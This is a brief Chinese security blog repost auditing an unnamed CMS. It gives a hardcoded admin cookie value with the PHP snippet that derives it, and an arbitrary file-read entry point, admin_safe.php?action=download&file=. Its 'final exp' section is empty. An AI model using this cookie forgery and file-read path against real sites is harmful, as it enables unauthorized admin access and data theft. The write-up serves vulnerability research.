powered by T4x0r-HashRun-HashMeow
admin_xxxxxx.php文件
翻看整个网站源码,发现没有路由书写
此cms路由构造:功能页面/action=函数方法
如此页面为admin_safe.php文件我要使用下载方法:
admin_safe.php?action=download&file=
cookie伪造
exp:
<?
echo md5(md5("t00ls").md5("t00ls"));
//cookie写死了:tools=e54285de394c4207cd521213cebab040
任意文件读取
然后basename函数特性决定了我们不需要用../../../来绕过路径
最终exp:
原文始发于微信公众号(T大4的小圈圈):【代码审计】某cms的一个小day
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论